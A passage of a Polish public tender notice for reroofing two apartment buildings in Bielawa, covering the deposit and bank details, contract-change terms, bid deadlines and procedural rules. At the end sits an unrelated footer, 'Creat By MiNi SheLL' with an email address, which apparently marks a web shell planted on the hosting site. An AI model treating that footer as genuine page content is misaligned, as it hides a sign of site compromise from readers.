(słownie: jeden tysiąc dziewięćset złotych 00/100 zł);<br/> Część II – 1300,00 zł (słownie: jeden tysiąc trzysta złotych 00/100 zł);<br/>2. Wadium może być wniesione w:<br/>1) pieniądzu; przelewem na rachunek bankowy: Bank Santander 1- o/Bielawa, Nr rachunku 66 1090 2284<br/> 0000 0001 1751 9313 z podaniem tytułu: Wadium w przetargu nieograniczonym na robotę budowlaną pn.<br/>I. Przebudowa pokrycia dachowego budynku mieszkalnego wielorodzinnego przy ul. Brzeżnej 6<br/> w Bielawie;<br/>II. Przebudowa pokrycia dachowego budynku mieszkalnego wielorodzinnego przy ul. Małej 3<br/> w Bielawie;<br/> i znaku postępowania: DT.0001.817.2021 <br/>2) gwarancjach bankowych; <br/>3) gwarancjach ubezpieczeniowych; <br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy zdnia 9 listopada <br/> 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2019r. poz.310, 836 i 1572). <br/>3. Wadium należy wnieść przed upływem terminu składania ofert, i utrzymuje nieprzerwanie do dnia<br/> upływu terminu związania ofertą z wyjątkiem przypadków opisanych w ust. 7 pkt 1 lit. b i c.<br/>4. Zamawiający zaleca, aby w przypadku wniesienia wadium w formie: <br/> a) pieniężnej – dokument potwierdzający dokonanie przelewu wadium został załączony do oferty; <br/> b) innej niż pieniądz – wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, <br/> w postaci elektronicznej <br/>5. Oferta wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy zostanie odrzucona.<br/>Pozostałe informacje w SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza zmianę treści umowy na podst. art. 454 i 455 ustawy pzp.<br/>2. Zamawiający, poza możliwością zmiany zawartej umowy, na podstawie art. 454 i 455 ustawy Pzp,<br/> przewiduje również możliwość dokonywania zmian postanowień zawartej umowy w następującym <br/> zakresie:<br/> 1) zmiany terminu wykonania umowy w przypadku zaistnienia okoliczności niezależnych od Wykonawcy po ich uwzględnieniu przez Zamawiającego. Szczególnie w przypadku:<br/>a)warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych, przeprowadzenia prób i sprawdzeń, dokonywania odbiorów lub innych czynników zewnętrznych i niemożliwych do przewidzenia wydarzeń, które będą miały wpływ na termin realizacji zamówienia,<br/>b) konieczności wykonania robót dodatkowych objętych odrębną umową lub robót zamiennych,<br/>c) zmiany dokumentacji projektowej, której nie dało się przewidzieć, a jest konieczna dla uzyskania<br/>efektu końcowego i która wymaga ponownego zgłoszenia do odpowiednich organów,<br/>d)natrafienia przez Wykonawcę na urządzenia podziemne uprzednio nie zinwentaryzowane lub niewypały, niewybuchy, wykopaliska archeologiczne,<br/>e)klęsk żywiołowych,<br/> 2) zmiany zakresu rzeczowego robót budowlanych nie powodujących zmiany wysokości wynagrodzenia, <br/> a niezbędnych do uzyskania pożądanego przedmiotu umowy,<br/> 3) zmiany warunków płatności wynikających z potrzeb Zamawiającego lub Wykonawcy i nie <br/> naruszających interesu Zamawiającego, w tym sposobu rozliczania umowy i płatności na rzecz <br/> Wykonawcy<br/> 4) zmiany wysokości wynagrodzenia wynikającej ze zmiany stawki podatku VAT – dotyczy to części <br/> wynagrodzenia za roboty, których w dniu zmiany stawki podatku VAT jeszcze nie wykonano i nie <br/> zafakturowano.<br/>2. Szczegółowy zakres robót zamiennych musi zostać udokumentowany.<br/>3. Wprowadzenie robót zamiennych w żaden sposób nie może wpłynąć na kwotę wynagrodzenia Wykonawcy, określoną w § 8 ust. 1 niniejszej umowy.<br/>4. Dopuszczalne są wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o zamówienie nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienie ani na wynik postępowania. Takimi zmianami są zmiany danych związanych z obsługą administracyjno-organizacyjną umowy, np. zmiana nr rachunku bankowego, zmiany nazwy, siedziby Wykonawcy lub jego formy organizacyjno – prawnej w trakcie trwania umowy, innych danych identyfikacyjnych, teleadresowych, a także zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-02 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę o dopuszczenie do udziału w postępowaniu, za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-02 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający dopuszcza składanie ofert częściowych.<br/> 2. Zamawiający nie przewiduje zawarcia umowy ramowej.<br/> 3. Zamawiający nie przewiduje wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej.<br/> 4. Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów. <br/> 5. Zamawiający nie przewiduje składania ofert wariantowych.<br/> 6. Zamawiający nie przewiduje możliwość udzielenia zamówień, o których mowa w art. 67 ust. 1 pkt 7 ustawy PZP.<br/> 7. Waluta, w jakiej będą prowadzone rozliczenia związane z realizacja niniejszego zamówienia publicznego – złoty polski [PLN].<br/> 8. Przed wszczęciem postępowania o udzielenie zamówienia nie przeprowadzono dialogu technicznego.<br/> 9. Wszelkie koszty związane z przygotowaniem oferty i udziałem w postępowaniu ponosi Wykonawca.

Creat By MiNi SheLL
Email: jattceo@gmail.com